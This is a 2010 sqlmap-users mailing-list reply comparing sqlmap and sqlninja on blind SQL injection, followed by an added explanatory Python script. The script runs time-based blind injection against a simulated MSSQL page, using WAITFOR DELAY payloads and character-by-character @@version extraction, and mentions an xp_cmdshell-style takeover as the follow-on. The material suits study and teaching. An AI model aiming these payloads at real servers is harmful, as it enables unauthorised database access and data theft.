Re: [sqlmap-users] hmm
From: David G. <sk...@gm...> - 2010-05-21 13:47:08
On Thu, May 20, 2010 at 9:20 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
> James,
>
> On Thu, May 20, 2010 at 12:30, <ja...@ev...> wrote:
> > ...
> > Have you noted that SQLMap misses a lot of vulns? Simple ones like
> >
> > windowsistrash.asp?id=1';waitfor delay '00:00:15'
> >
> > And also more complex POST vulns? I've been using SQLNinja on the advice
> > of my friend Bert and it appears to pwn windoze better than SQLmap...
> > ...
>
> As I said several times, sqlmap can detect only boolean-based blind
> SQL injection at first. If and once it identifies this type of
> injection, it can be used to test and exploit UNION query and stacked
> queries. This is a design flaw which will be fixed in the upcoming
> months.

We are eagerly waiting for it to become true!!

> sqlninja is not able to detect the injection, you have to instruct it
> where it is and how to exploit it in the sqlninja.conf file. It uses
> only waitfor delay (time-based blind SQL injection) to enumerate very
> little data, the only data needed to take it over. This is why it "pwn
> windoze better".

Yes, sqlninja can collect just some info from the database, like the version (2000/2005), database user, privs, etc. It's just a "pwnage" MSSQL tool. Also, icesurf (the developer) just released version 0.2.5 these days.

I usually use the tools in backtrack for pentesting databases (/pentest/dabase). For full-blind (time-based) SQL injection, as you need, I always use the tool "sqlbrute.py" with some modifications to suit my needs.

Tools for pentesting databases, as available in backtrack, are described on this page: http://itbreathes.com/?p=59

--
David Gomes Guimarães
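The two points made in the thread, that sqlninja relies purely on WAITFOR DELAY and that a fully blind (time-based) injection has to be enumerated one comparison at a time, are easy to see in code. The following is an added example written for this page; it is not code from the thread, from sqlmap, sqlninja or sqlbrute. It assumes a simulated MSSQL-backed page (`simulated_target`, a constructed stand-in for `windowsistrash.asp?id=`) that evaluates exactly one injected statement shape, a constructed value standing in for `@@version`, and a delay of a few hundredths of a second so the script runs quickly; against a real server the delay would be the `'00:00:15'`-style value from James' payload and the threshold would be tuned to network jitter.

```python
"""Time-based blind SQL injection: detection, then character-by-character
extraction, against a simulated target.  Added example, not from the thread."""
import re
import time

DELAY_SECONDS = 0.03          # stand-in for WAITFOR DELAY '00:00:15' (assumption: short for demo)
SECRET_VERSION = "Microsoft SQL Server 2005"   # constructed stand-in for @@version
REQUESTS = {"count": 0}       # how many requests the extraction costs

# Only statement shape the simulated server "executes" after the original query:
#   IF (ASCII(SUBSTRING(@@version,<pos>,1))><n>) WAITFOR DELAY '...'
_CONDITIONAL = re.compile(
    r"IF\s*\(ASCII\(SUBSTRING\(@@version,(\d+),1\)\)\s*>\s*(\d+)\)\s*WAITFOR DELAY", re.I)


def simulated_target(id_value: str) -> str:
    """Constructed stand-in for an ASP page that concatenates ?id= into its query
    and allows stacked queries (the MSSQL case discussed in the thread)."""
    REQUESTS["count"] += 1
    query = f"SELECT name FROM items WHERE id={id_value}"
    m = _CONDITIONAL.search(query)
    if m:
        pos, n = int(m.group(1)), int(m.group(2))
        ch = SECRET_VERSION[pos - 1] if pos <= len(SECRET_VERSION) else "\0"
        if ord(ch) > n:
            time.sleep(DELAY_SECONDS)           # condition true: server stalls
    elif re.search(r"WAITFOR DELAY", query, re.I):
        time.sleep(DELAY_SECONDS)               # unconditional delay, as in James' payload
    # The page body is identical in every case: there is nothing to read, only timing.
    return "<html>item</html>"


def timed_request(payload: str) -> float:
    """Send one request and return how long it took (seconds)."""
    t0 = time.perf_counter()
    simulated_target(payload)
    return time.perf_counter() - t0


def is_time_based_injectable() -> bool:
    """Detection step: does an injected WAITFOR DELAY measurably stall the response?
    Compares against a baseline request so a slow-but-sane server is not a false positive."""
    baseline = timed_request("1")
    delayed = timed_request("1;WAITFOR DELAY '00:00:05'--")
    return delayed - baseline >= DELAY_SECONDS / 2


def char_greater_than(pos: int, n: int) -> bool:
    """Oracle: one yes/no answer, is ASCII(@@version[pos]) > n?  Answer is the delay."""
    payload = f"1;IF (ASCII(SUBSTRING(@@version,{pos},1))>{n}) WAITFOR DELAY '00:00:05'--"
    return timed_request(payload) >= DELAY_SECONDS / 2


def extract_char(pos: int) -> str:
    """Binary search over the 7-bit ASCII range: 7 requests per character,
    versus up to 127 with a linear scan (what sqlbrute-style tools optimise)."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if char_greater_than(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)            # chr(0) once we run past the end of the string


def extract_version(max_len: int = 64) -> str:
    """Pull @@version out one character at a time until the NUL past its end."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(pos)
        if ch == "\0":
            break
        out += ch
    return out


if __name__ == "__main__":
    print("time-based injectable:", is_time_based_injectable())
    REQUESTS["count"] = 0
    version = extract_version()
    print(f"recovered {version!r} in {REQUESTS['count']} requests")
```

The request count printed at the end is the practical reason behind Bernardo's remark that sqlninja enumerates "very little data": with only a timing oracle, every character costs several full delays, so a tool built on WAITFOR DELAY alone is best used to learn just enough (version, user, privileges) to move on to an xp_cmdshell-style takeover rather than to dump tables.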